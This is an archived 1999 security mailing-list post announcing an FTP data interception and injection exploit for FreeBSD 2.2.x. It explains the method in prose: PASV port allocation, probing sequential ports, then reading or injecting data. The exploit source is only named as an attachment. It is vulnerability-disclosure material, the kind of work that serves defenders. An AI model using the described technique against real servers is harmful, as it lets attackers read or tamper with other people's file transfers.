Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 1999-q4

Exploit-Dev Archives: Free BSD 2.2.x listen() problem / FTP ex

Free BSD 2.2.x listen() problem / FTP exploit

3APA3A (3APA3ASECURITY.NNOV.RU)
Fri, 15 Oct 1999 15:04:24 +0400

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Next message: David R. Conrad: "Re: 2 dodgy network programs"
Previous message: Mithun Bhattacharya: "Re: Window manager - implementation bug/feature ???"

Hello VULN-DEVSECURITYFOCUS.COM,

Just to break a long silence....

  Here is exploit. It works as described in NAI 1996 bulletin
  http://www.nai.com/nai_labs/asp_set/advisory/ftp-paper.asp
  Sorry, if this one isn't new - just treat it as a reminder.

  but.... there are two things i'm disagree with NAI.
  1. ftp console client under FreeBSD 2.2.x does vulnerable
  2. Inspite I don't treat FTP as secured protocol IMHO it's
  OS/software weakness, not FTP protocol weakness.

  I'm less then year on Bugtraq and other security-related lists, so I
  don't know if this problem was already discussed. I don't have
  neither time no desire to dig it in archives. But the reason exploit
  works against FreeBSD seems to be incorrect listen() implementation
  together with ftp software weakness. If this problem (with listen())
  is new, please let me know and i'll report it.

  Works (confirmed) against next software under FreeBSD 2.2.1-2.2.5 (
  i will be wondered if it works on some other OSes, cause the problem
  is specific):

  1. Ftp servers (standard FTPD and WU-FTPD - seems it's not depends
  on version) then clients connect in passive mode. Data can be
  intersected then transmitted from server to client.
  2. Standard console ftp client. Data can be injected (exploit
  requires ftp server running on client machine - FTP is used to
  predict port number).

I didn't tested injecting data in FTP server in active mode and
intersecting data from client in passive mode.

  How it works:
  1. Connects to ftp server on victim and
  2. uses PASV command to allocate PORT on remote machine. Then
  3. attacks few sequenced ports with connect().
  4. If connect() succeeds waits dome time for data to be received. If
  there is no data in timeout - send()s data to victim.

  Exploit isn't perfect. May be the better way is to use RAW-sockets
  and send SYN packets, but:
  1. (disclaimer) This exploit just shows the vulnerability is. You
  must not use it for purpose other then testing your software.
  2. Compatibility.

         /\_/\
        { . . } |\
+--oQQo->{ ^ }<-----+ \
| 3APA3A U 3APA3A }
+-------------o66o--+ /
                    |/
http://www.security.nnov.ru

application/octet-stream attachment: ftpspy1.c

Next message: David R. Conrad: "Re: 2 dodgy network programs"
Previous message: Mithun Bhattacharya: "Re: Window manager - implementation bug/feature ???"

This archive was generated by hypermail 2.0b3 on Fri Oct 15 1999 - 10:09:34 CDT